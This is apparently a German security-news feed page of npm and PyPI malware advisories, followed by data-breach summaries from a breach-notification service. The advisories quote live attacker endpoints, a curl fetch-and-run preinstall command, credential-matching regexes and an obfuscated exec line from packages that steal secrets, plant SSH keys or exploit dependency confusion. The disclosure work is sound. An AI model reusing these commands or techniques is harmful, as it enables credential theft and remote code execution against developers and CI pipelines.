| Risiko / Label | Veröffentlichung | |
|---|---|---|
| Risiko ? / 10 MAL-2026-5697 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (3d2c385c177531c421e5a49f41d931890a48c16c921b23cc20f2bf4cd8fae893) On `npm install`, postinstall.js sends an HTTPS POST to https://ddactic-lab.online/sc/beacon carrying the package name/version, Node version, OS, CI-detection result, and the GITHUB_REPOSITORY, GITHUB_REPOSITORY_OWNER, and GITHUB_WORKFLOW environment variables when present. A DNS-lookup fallback encodes the same identifiers as a subdomain under `*.b.ddactic-lab.online` so the leak still completes even when HTTP egress is filtered — a pattern intended specifically to defeat egress controls. The package itself is a hollow placeholder: package.json describes it as an `npm 404 error` reference and index.js does nothing but `require('web-model-bridge')` (its own name) inside a try/catch, so the only effect of installing it is the install-time beacon. Any CI pipeline whose dependency tree references this name will leak the owning GitHub org/repo/workflow identity to an unrelated third-party domain on every build. ## Source: ghsa-malware (8ce6eba68a26a38f2702f3d378b5302c82744be39e2bba6a8ad39b21d8267a80) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5677 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (0e11b6161f4fe3c591bddadbf275003eaac33a1478cda408ac51d85230292e6d) package.json declares `"postinstall": "node main.js"`, so installation of worker-build@9.0.1 unconditionally executes main.js on `npm install`. main.js collects host identity (os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), process.argv), reads the consumer's package.json, runs `git config --get remote.origin.url`, and iterates a hardcoded list of credential-shaped environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, NPM_TOKEN, GITHUB_TOKEN, GITLAB_TOKEN, API_KEY, SECRET_KEY, PASSWORD, TOKEN, DATABASE_URL, MONGODB_URI, REDIS_URL), capturing the first 50 characters of each populated value. The collected JSON payload is POSTed in cleartext to `http://jh4wt1kccd0ul174qgmge9n8izozcu0j.oastify.com/exfil` and `/api/exfil`, with an additional DNS lookup against the same host as a side-channel beacon. The package name mimics legitimate Cloudflare Workers build tooling, positioning the package for dependency-confusion against installers that misresolve an internal name to the public registry. ## Source: ghsa-malware (2e93efdba4287480cd7e19a76b82fc17c7b7c9bd446fdc35d0ac2bfab1f628df) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (b5005e4bec545b403f3be10160a08d634d34b5d8ab8e76a185a4a5ba34706719) The OpenSSF Package Analysis project identified 'worker-build' @ 9.0.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. | ||
| Risiko ? / 10 MAL-2026-5530 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c15c40b8371646f167ffa7d5a2ba2c8d0fd454ef7054eeb41807a1a3eda8e7a6) On `npm install`, this package runs `node test.js` via `scripts.postinstall`, which executes the logic in `index.js`. The postinstall behavior performs three distinct installer-side attacks: (1) it recursively walks the installer's home directory (and on Windows, non-C: drives plus C:\Users\), matching files against a remotely-fetched pattern list, then POSTs each matched file plus username/platform metadata to `http://cloudflare-prevention.vercel.app/api/v1` via FormData (`batchUpload(found, "http://cloudflare-prevention.vercel.app/api/v1", success)`); (2) on Linux, `addSshKeyToUser` fetches an attacker-supplied SSH public key from `http://cloudflare-prevention.vercel.app/api/ssh-key` and appends it to `~/.ssh/authorized_keys` with mode 0600, then runs `sudo ufw enable` and `sudo ufw allow 22/tcp` to ensure inbound SSH is reachable — giving the operator persistent remote root-equivalent access to the host; (3) `from_str_1` recursively scans `process.cwd()` for `id.json` (Solana wallet keypair), `config.toml`/`Config.toml`, `env`, and `.env`, uploading each match to a sibling endpoint. Scan patterns, block patterns, and the SSH key are all fetched over plain HTTP from `cloudflare-prevention.vercel.app` — a Vercel-hosted lookalike of a Cloudflare-branded service — meaning the operator can mutate which files are exfiltrated and which key is granted SSH access at any time. ## Source: ghsa-malware (4e0f6d8b0cf401a707b6dfec19e238c001ea685edfcbb94d388c80983826ab78) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5808 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (2ee48ee7b6045907414fd157235c904e9de41a64666deda286a011e0abc17b6e) On `npm install`, the package automatically runs `node index.js` via `scripts.preinstall`. The script collects host identity (hostname, username, cwd) and filters `process.env` for keys matching /key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher/i, then POSTs the resulting JSON to https://2.25.140.71:8443/surflending/npm-confusion. Errors are swallowed (`|| true`) to hide failures. The credential-shaped regex (mnemonic/seed/private/blockfrost) targets crypto-wallet and infrastructure secrets, and the path `/surflending/npm-confusion` together with the suspicious 9.9.9 version is consistent with a dependency-confusion attack against an internal `surf-lending` package. Any developer or CI environment installing this package will leak its secrets to the attacker-controlled endpoint. ## Source: ghsa-malware (d146bef145fcfc130e133a5c859ad346e934154820dc99baed00d5a4ae7304b9) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5707 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (98ea79d9fce12a87d3949dc748617f8077a1ae0822fadab451c27d2c8a2feb9b) ttspc-server-sample@99.9.0 declares `postinstall: node index.js` in package.json, so on `npm install` it automatically executes index.js. The script collects the installer's hostname, username, current working directory, network interface IPs/MACs, OS info, the presence of env vars including credential-shaped names (APP_KEY/APP_SECRET/etc.), and the full process list (`ps aux` on Unix, `tasklist /V` on Windows), then HTTP POSTs the JSON payload to a hardcoded Burp Collaborator endpoint at http://dduqpvg687wohv3ymaiaa3j2etks8swh.oastify.com (with a secondary reference to http://your-id.burpcollaborator.net). The package self-labels via `X-PoC-Type: dependency-confusion` / `X-PoC-Package: ttspc-server-sample` headers and uses an inflated 99.9.0 version designed to win semver resolution against a victim org's private internal package of the same name. Even framed as a PoC, the install-time exfiltration of host identifiers, internal IP addresses, credential-variable names, and running process inventory to an attacker-controlled OAST host is a real supply-chain attack against any installer that resolves this public package instead of the intended private one. ## Source: ghsa-malware (4ddedc3893550000dcaca1eb0331eba8bcce1a131d2da11912a184d7dfd5ab1b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (91d0c4ae89a4f630e59ca4960fdff3832c8fa9d4b7dbbdf148abe39b260c7ec8) The OpenSSF Package Analysis project identified 'ttspc-server-sample' @ 99.9.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. | ||
| Risiko ? / 10 MAL-2026-5646 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe) package.json declares a preinstall lifecycle hook that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On any `npm install`, the script fetches an unpinned, mutable JavaScript file from poc.amanrawat.com over plain HTTPS and immediately executes it with node under the installer's user account. There is no hash or signature verification, no version pinning, and the destination is not a recognized runtime/CDN or publisher-owned host. The package name (`sn-internal-testjgsakjdkjadkjahsdkjad`), description ("This is our internal app for testing"), and the `poc.` (proof-of-concept) hostname indicate this is a dependency-confusion / supply-chain PoC, but the install-time payload is a real and unconditional remote-code-execution primitive against any installer. ## Source: ghsa-malware (73c4d1ca16d75bd52c1faca9dd24b2a3486a274552372399f66597d58ab281c3) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5645 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d) package.json declares a preinstall lifecycle script that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On any `npm install` of this package, the installer's machine fetches an unauthenticated, unpinned, mutable JavaScript file from an external author-controlled host and immediately executes it under Node.js with the installer's user privileges, overwriting the package's own index.js. The package describes itself as 'This is our internal app for testing' but is published to the public npm registry with no library functionality — the entire install-time effect is the remote fetch-and-execute. Whatever bytes are served at https://poc.amanrawat.com/hehe.js at install time become arbitrary code running on the installer's machine. The shape is consistent with a dependency-confusion proof-of-concept or active dropper: an internal-sounding name on public npm whose sole behavior is to pull and run remote code. ## Source: ghsa-malware (911b6003b52604acc4b2710df9f978bb93124ca9ffd558f41c6150ce5bb4dd4b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5490 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c0e07a765f6ef2042da47b1c017ecc5f6f1f99167da76e04c4b2c4ea6ecfcb83) sb-original@9999.99.99 is an unscoped package whose version is set to 9999.99.99 to win semver resolution against any internal package of the same name. index.js transparently re-exports the real `sb-original` module so consumers see normal functionality, while a postinstall script silently fingerprints the installing environment. On `npm install`, postinstall.js POSTs JSON containing the consuming package name/version, Node version, OS, detected CI provider, and GitHub repository/owner/workflow identifiers to https://ddactic-lab.online/sc/beacon (postinstall.js:32). It also performs a DNS-based fallback that encodes the same fields as a subdomain of b.ddactic-lab.online (postinstall.js:46 `dns.lookup(`${sl}.${ci}.${h}.b.ddactic-lab.online`,...)`), which is designed to bypass HTTP egress controls. The combination of an extreme version floor, a transparent proxy main, and unconditional install-time exfiltration of GitHub repo identifiers to an attacker-controlled domain is the canonical dependency-confusion attack shape. ## Source: ghsa-malware (91923b6b76ff0debad26c6bac2dea8e0634346410ac928f93c02605f21851d27) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5614 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (728f3d5af5a999be016a49283fff2c5cedc0c5df445d2f078f1f9817dde22334) On `npm install`, postinstall.js harvests installer secrets and POSTs them to 193.203.169.109:8443/c/janus-erc20 over HTTPS with TLS verification disabled (`rejectUnauthorized:false`). The script (1) collects hostname, username, and cwd, (2) iterates `process.env` and filters keys matching `/KEY|SECRET|TOKEN|PRIVATE|MNEMONIC|PASSWORD|RPC|ALCHEMY|INFURA|DATABASE|WALLET/i`, (3) reads `.env` files from cwd, parent directories, and the home directory, and (4) reads `~/.npmrc` (which contains npm auth tokens) and `~/.config/ipor-fusion/config.json`. Errors are silenced with `2>/dev/null||true`. The main `index.js` is empty — the package has no legitimate ERC20 functionality and exists solely to deliver the postinstall harvester. The targeted IPOR Fusion config path plus the generic blockchain-sounding name indicates the package is positioned as a namespace lure against IPOR Fusion / DeFi developers. ## Source: ghsa-malware (6e537c421c5b4b7f2450374573623759822628bfa17500279b6db5a46616835c) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5557 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8d7caaba8f20d0f04bcb79ab4046d34bea20b858ed3fc37931c76109b366835f) On `npm install`, the package's postinstall.js script harvests installer-side secrets and ships them to a hardcoded bare-IP C2 endpoint. Specifically, it (1) collects hostname, username, and cwd; (2) iterates process.env and selects keys matching the regex /KEY|SECRET|TOKEN|PRIVATE|MNEMONIC|PASSWORD|RPC|ALCHEMY|INFURA|DATABASE|WALLET/i; (3) reads.env from cwd, parent directories, and the user's home directory; (4) reads ~/.npmrc (leaking npm auth tokens that enable further supply-chain compromise) and ~/.config/ipor-fusion/config.json (targeting users of the IPOR Fusion DeFi protocol); and (5) POSTs the bundled payload to https://193.203.169.109:8443/c/janus-ft with TLS verification disabled (`rejectUnauthorized:false`). The package's main entry (index.js) is `module.exports = {};` — it provides no actual functionality, confirming the package exists solely to execute the credential-harvesting payload at install time. The targeted read of ipor-fusion config plus the blockchain-developer-oriented env keyword list (MNEMONIC, PRIVATE, WALLET, ALCHEMY, INFURA) indicate this is a targeted attack on DeFi/blockchain developers. ## Source: ghsa-malware (46db71c89959b7ccb823e87a8d97d3771b3294f247eceb0296d3ec639591b7de) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5556 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (2d33c10c068a69d14d0333b93de7745caffd62013c57de6c55f20a6b53ffdcb1) On `npm install`, the package's postinstall hook (`node postinstall.js 2>/dev/null || true`) silently runs a credential harvester against the installer machine. postinstall.js collects `os.hostname()`, `os.userInfo().username`, `process.cwd()`, platform, and timestamp; iterates `process.env` for keys matching `/KEY|SECRET|TOKEN|PRIVATE|MNEMONIC|PASSWORD|RPC|ALCHEMY|INFURA|DATABASE|WALLET/i`; reads `.env` files from multiple paths and `~/.npmrc`; and POSTs the resulting JSON blob to `https://193.203.169.109:8443/c/janus-flow` with `rejectUnauthorized:false` (TLS verification disabled). The lifecycle command's stderr redirect plus `|| true` suppresses any failure from the installer. The package's advertised purpose ("Flow blockchain utilities") is a cover story: `index.js` exports `{}` and provides no functionality, so the only effect of installing this package is the credential beacon. The destination is a bare IP unrelated to any Flow blockchain publisher and matches no legitimate vendor endpoint. ## Source: ghsa-malware (73f6fff46550b6c53f7e1f87b6cf346eafd325b934434b441b4ef1756c914f9d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5806 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b5e410fabd766facf41c970113c2a0a1b06b67b82521ffae20a32328cd74994e) On `npm install`, the package's preinstall hook executes `node index.js`, which collects the host's `os.hostname()`, `os.userInfo().username`, current working directory, and all environment variables whose names match a credential-shaped regex (`key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher`). The harvested data is POSTed as JSON to the bare IPv4 endpoint `https://2.25.140.71:8443/surflending/npm-confusion`. The package metadata is a stub (`description: "flowdefi SDK"`, no repository, no author, version pinned to `9.9.9` — a classic dependency-confusion high-version trick), and the exfil path is literally named `/surflending/npm-confusion`, indicating a dependency-confusion attack targeting an internal package named `flowdefi`, likely belonging to a Cardano/DeFi project (the regex specifically targets Cardano-ecosystem secrets such as `blockfrost`, `mnemonic`, `seed`, `batcher`). Installing this package on a developer or CI machine will leak wallet seed phrases, private keys, API tokens, and other secrets to the attacker. ## Source: ghsa-malware (224957c95a54d8bc6cdfa2f0153483240125d9879182a51d3accbd4137cd7465) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5805 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (21379b9b1e9f6a64a18a806531d9f1bb22394694b092eb2b26b6b4d356bd5a4a) On `npm install`, package.json's preinstall hook runs `node index.js`, which collects host identity (os.hostname(), os.userInfo().username, cwd) and scrapes process.env for any key matching the regex `key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher`, then POSTs the resulting JSON to https://2.25.140.71:8443/surflending/npm-confusion (index.js lines 13-17). The destination is a bare IP rather than any publisher- or vendor-owned host, and the request path (`/surflending/npm-confusion`) self-describes the intent as a dependency-confusion exfiltration channel. The package name `flowcardano` impersonates Cardano-ecosystem tooling and is published at version 9.9.9, the canonical dependency-confusion bait version chosen to outrank legitimate internal packages in resolver order. Any developer or CI agent that installs this package leaks credential-shaped environment variables (wallet seeds/mnemonics, private keys, Blockfrost / Telegram / Redis tokens, generic API tokens and passwords) along with host identifiers to the attacker. ## Source: ghsa-malware (becf0970b25d3fece917cf67cf2734c2109c5b8b900f2c63f8f78679b7f5eae9) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5804 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (faf2e80d03da797a24237629d2c2bc87fa936f996c4de55bcd938283b1a617b9) flow-lending-sdk@9.9.9 declares `preinstall: node index.js || true` in package.json, causing index.js to execute automatically on `npm install`. The script collects host identity (hostname, username, cwd) and iterates `process.env`, filtering for keys matching /key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher/i — i.e., wallet seed phrases, private keys, API tokens, and infrastructure credentials. The collected JSON is HTTPS-POSTed to the bare IP `2.25.140.71:8443` at path `/surflending/npm-confusion`. The package ships no real SDK functionality (description is the placeholder `flow-lending-sdk SDK`, version is `9.9.9`), and the exfil URL path explicitly names this as a dependency-confusion attack — almost certainly targeting developers of Cardano/Flow lending infrastructure who expect a private internal package of this name. ## Source: ghsa-malware (0c53f2d309499f7c77e2fc1024ece82ca775f13741abacdcaf4ede50fa6c8e39) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5803 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (244fb3d5df39fbdba24f9a22b86d0bca43667f3376a9529d5cc84e411f11a28f) On `npm install`, the package's preinstall lifecycle hook executes index.js, which collects host identity (hostname, username, cwd) and enumerates process.env, filtering keys against the regex /key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher/i. The collected JSON is POSTed over HTTPS to a hardcoded bare IP destination (https://2.25.140.71:8443/surflending/npm-confusion). The package provides no legitimate functionality; the path component 'surflending/npm-confusion' and the 9.9.9 version (a version-bump pattern used to win dependency-confusion resolution) indicate a directed dependency-confusion attack against an internal Cardano/SundaeSwap-related package name. Any installer with wallet-related secrets in environment variables (mnemonics, private keys, blockfrost tokens, telegram bot tokens, redis credentials, batcher keys) loses them at install time. ## Source: ghsa-malware (31f3b9a8a1c9a108f544556d9f0ed2d1642e847bfe36ba050aab0011fb9d731d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5801 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (75aea05ceba339fbc9f0764e178d0cac8170219115218d635b14639ec01410a4) package.json declares `preinstall: node index.js`, which fires automatically on `npm install`. index.js collects host identifiers (os.hostname(), os.userInfo().username, cwd) and enumerates process.env, filtering keys by the regex /key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher/i to capture credential-shaped values (API keys, seed phrases, mnemonics, private keys, Telegram bot tokens, Blockfrost keys, Redis URLs, batcher keys). The harvested JSON is POSTed to https://2.25.140.71:8443/surflending/npm-confusion — a hardcoded bare-IP endpoint. The attacker-chosen URL path `/surflending/npm-confusion` and the sentinel version 9.9.9 indicate a dependency-confusion attack targeting a private `bodega-sdk` package (likely SurfLending/Bodega DEX on Cardano): any organization with an internal package of this name risks the public copy resolving on install, leaking credentials from CI runners and developer machines unconditionally. ## Source: ghsa-malware (fbdcacc3104a9f8f465f677b36d460e4f56e50654720b0d0bc0217e58f9bd6ce) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5546 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (b54a3dc296ec3f6dbded973e24aa9794b498cc1e8305fc3d1f88a4fdff7335df) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | ||
| Risiko ? / 10 MAL-2026-5839 | vor 5 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (281ede3c5b3181c2df22a4b32a01453a51ac389a1dfe8bde69d53821cbaf20d4) cipherflow advertises itself as a zero-dependency pure-Python AES/DES library, but cipherflow/_environ.py contains a multi-layer-obfuscated payload that is decoded and passed directly to exec(). The blob is base85-decoded, XOR'd against a 32-byte key, then zlib-decompressed before being executed: `exec(zlib.decompress(bytes(__[i]^_[i%len(_)] for i in range(len(__)))).decode())` with `__ = base64.b85decode(b'MJ*(r4W!?y...')`. This payload is exposed via cipherflow.setup_env() (declared in __all__), whose docstring translates to 'download and execute external environment'. The function is not mentioned anywhere in the README/PKG-INFO. The combination of triple-stacked encoding (base85 + XOR + zlib) terminating in exec(), placement inside a cover-named module (_environ.py / setup_env), and intentional omission from documentation are canonical signals of hidden malicious code execution. Any consumer who imports cipherflow and invokes setup_env() — or any downstream code that does so — runs whatever bytes the author chose to hide, with full process privileges. ## Source: kam193 (c5572ca4917ed5ce72dfcb7d82abb3a085cdaed9f1992463800826bc18249f91) The package contains obfuscated code to download executables from a typosquatted domain. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-cipherflow Reasons (based on the campaign): - obfuscation - Downloads and executes a remote executable. | ||
| 15.06.2026 - June 2026 Stealer Logs | 56.278.397 Datensätze geleaked | |
| Email addresses, Passwords In June 2026, a collection of accumulated stealer logs from various sources was added to HIBP. The corpus comprised 56M unique email addresses across hundreds of millions of stealer log records. The data also contained 124M unique passwords, which have been added to Pwned Passwords and are now searchable. Individuals can view any records captured against their email address in the stealer logs section of their dashboard. Organisations can see logs affecting their domain via the stealer logs API. |
||
| 09.06.2026 - University of Nottingham | 454.635 Datensätze geleaked | |
| Academic records, Citizenship statuses, Dates of birth, Disabilities, Email addresses, Ethnicities, Genders, IP addresses, Names, Passport numbers, Phone numbers, Physical addresses, Purchases, Salutations, Usernames In June 2026, the University of Nottingham was the target of a cyber attack, later linked to a ShinyHunters "pay or leak" extortion campaign. Tens of gigabytes of data were subsequently published online and included 455k unique email addresses along with extensive personal information including names, addresses, phone numbers, ethnicities, disabilities, passport numbers and information relating to academic enrolments and fee payments. In a post about the incident, the university advised that the breach affected both "current students, and alumni". |
||
| 30.05.2026 - Atlas Menu | 63.926 Datensätze geleaked | |
| Email addresses, IP addresses, Passwords, Support tickets, Usernames In May 2026, the GTA V and CS2 cheat service Atlas Menu suffered a data breach. An attacker claimed to have gained access to all Atlas systems and published the service's database to a public GitHub repository. The incident exposed 64k unique email addresses along with usernames, IP addresses, support tickets and passwords stored as bcrypt hashes. |
||
| 29.05.2026 - BCD Travel | 396.313 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets In May 2026, the corporate travel management company BCD Travel was claimed as a victim of the ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from BCD was subsequently published publicly in early June and contained 396k unique email addresses. Other exposed data included names, addresses, phone numbers, job titles and employer names, spanning a variety of different data sets including leads, internal staff and support tickets. |
||
| 23.05.2026 - Baker Distributing | 102.935 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In May 2026, the HVAC/R wholesale distributor Baker Distributing Company was added to the ShinyHunters data extortion group's "pay or leak" site. In early June, the group publicly published data they claimed had been obtained from Baker's SharePoint and Salesforce infrastructure including 103k unique email addresses along with names, physical addresses, phone numbers and tickets relating to the company's HVAC contractor customer base. The exposed data was largely corporate contact and support information with limited sensitivity. |
||
| 23.05.2026 - Charter | 4.851.517 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated. |
||
| 23.05.2026 - DentaQuest | 2.553.599 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Government issued IDs, Health insurance information, Names, Phone numbers, Physical addresses In May 2026, the dental benefits administrator DentaQuest was the target of a ShinyHunters "pay or leak" extortion campaign that resulted in the group publicly publishing hundreds of gigabytes of data allegedly obtained from the company. The data included 2.6M unique email addresses along with names, addresses and phone numbers. Much of the data appeared in healthcare enrollment files (ASC X12 transaction sets) with some containing Medicaid IDs, while additional data appeared in member records and related files. DentaQuest acknowledged "a cybersecurity incident involving unauthorized access to a limited portion of our network", and advised they had contained the attack and mitigated the threat. |
||
| 05.05.2026 - Cushman & Wakefield | 310.431 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers. |
||
| 30.04.2026 - Reborn Gaming | 126 Datensätze geleaked | |
| Email addresses, IP addresses In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned. |
||
| 28.04.2026 - Vimeo | 119.167 Datensätze geleaked | |
| Email addresses, Names In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information". |
||
| 26.04.2026 - CTT | 468.124 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers which can be used to retrieve the tracking history of the parcel. |
||
| 24.04.2026 - Udemy | 1.401.259 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses In April 2026, online training company Udemy was the victim of a “pay or leak” extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer. |
||
| 20.04.2026 - ADT | 5.488.888 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people. |
||
| 20.04.2026 - Aman | 215.563 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes. |
||
| 20.04.2026 - Canada Life | 237.810 Datensätze geleaked | |
